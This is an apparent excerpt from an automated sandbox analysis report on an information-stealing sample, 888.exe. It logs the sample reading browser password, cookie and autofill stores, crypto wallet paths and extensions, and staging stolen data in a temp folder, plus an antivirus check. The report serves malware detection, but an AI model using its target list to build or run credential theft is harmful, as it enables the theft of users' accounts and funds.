Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\888.exe VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Wallets VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Firefox_Firefox.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Edge_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\888.exe Queries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_012D73D3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_012D73D3
                    Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: 888.exe, type: SAMPLE
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 0.0.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: Process Memory Space: 888.exe PID: 5752, type: MEMORYSTR
                    Source: 888.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: 888.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                    Source: 888.exe String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\Desktop\888.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
